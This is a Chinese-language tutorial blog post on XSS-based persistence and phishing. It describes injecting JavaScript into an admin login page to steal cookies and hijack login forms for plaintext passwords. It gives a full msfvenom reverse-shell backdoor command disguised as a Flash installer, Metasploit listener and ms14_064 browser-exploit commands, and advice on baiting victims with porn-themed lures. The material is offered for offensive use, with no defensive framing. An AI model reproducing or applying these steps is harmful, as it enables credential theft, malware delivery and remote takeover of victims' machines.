#知识点:
1、XSS跨站-另类攻击手法分类
2、XSS跨站-权限维持&钓鱼&浏览器等
#XSS-后台植入Cookie&表单劫持
-条件:已取得相关web权限后
1、写入代码到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现权限维持
2、若存在同源策略或防护情况下,Cookie获取失败可采用表单劫持或数据明文传输实现
这个是在我们获取web权限之后,如何进行权限维持的相关操作。
(获取了web权限不代表着我们就可以进入后台。)
首先我们想打的肯定是写入后门,但是后门可能会被杀毒软件杀掉。此时我们可以将js代码写入到登录成功文件中,因为是js代码,一般查杀的也查不到。接着我们利用平台实时监控。当管理员登录后台的时候我们就可以在平台上得到它的cookie来实现为授权访问。
这里演示xss平台:
首先我们创建项目之后,将代码复制到登陆文件,然后当管理员登录的时候,cookie信息就会传到平台上
但是由于这里有防护措施,所以导致我们获取到的cookie不全或则不对,可以比较一下平台获取的和网站上cookie的区别
因此我们就不能利用盗取的cookie来进行未授权访问。并且我们在数据库中拿到的账号密码由于被加密了,并且我们破解不了。接下来就尝试利用表单劫持来获取管理员的明文账号密码。当管理员登录后台输入完账号密码时,点击登录,我们就可以在预先准备好的地方接受账号密码。
因为我么脚本语言是php,是不能直接执行js代码的,所以需要有个变量去接收,然后输出到浏览器,然后浏览器就会执行,并且这个还不会在页面中显示,只会以数据包的形式发送。
这个表单劫持一方面是cookie没用的时候,一方面是数据库中的密码我么无法解密的时候。这两个时候可以利用表单劫持来获取账号密码。
#XSS-Flash钓鱼配合MSF捆绑上线
-条件:beef上线受控后或直接钓鱼(受害者爱看SESE)
1、生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe
2、下载官方文件-保证安装正常
3、压缩捆绑文件-解压提取运行
4、MSF配置监听状态
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
5、诱使受害者访问URL-语言要适当
这个就是xss配合msf实现钓鱼,具体方法是首先我们知道这个人对什么感兴趣,比如喜欢色色,喜欢吃瓜。然后利用msf生成一个后门,把名字改成flash.exe,图标可以利用restorator这个工具换成官方的图标(这里用向日葵举例)
然后我们下载官方flash的安装包,把官方的安装包和后门文件捆绑起来(捆绑就是把他俩压缩成一个压缩包,保证目标下载完压缩包也能正常的安装,不让他起疑心)。接着我们准备好那个url,语言尽量的吸引目标,能让他去点击。
点击之后,目标肯定就抑制不住去点击照片,然后提示flash版本过低,然后就会跳转到我们那个事先准备好的地址
当目标点击立即下载,就会下载我们事先准备好的压缩包(这里事百度地址,自己更改一下)然后我们就在msf那里拿到了目标的shell权限
#XSS-浏览器网马配合MSF访问上线
-条件:beef上线受控后或直接钓鱼(浏览器存在0day)
1、配置MSF生成URL
use exploit/windows/browser/ms14_064_ole_code_execution
set allowpowershellprompt true
set target 1
run
2、诱使受害者访问URL-语言要适当
这个因为比较老了,是winxp和win7才有的,所以我就没写。感兴趣的看一下下面的链接。
https://www.cnblogs.com/redHskb/p/11571396.html
390
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
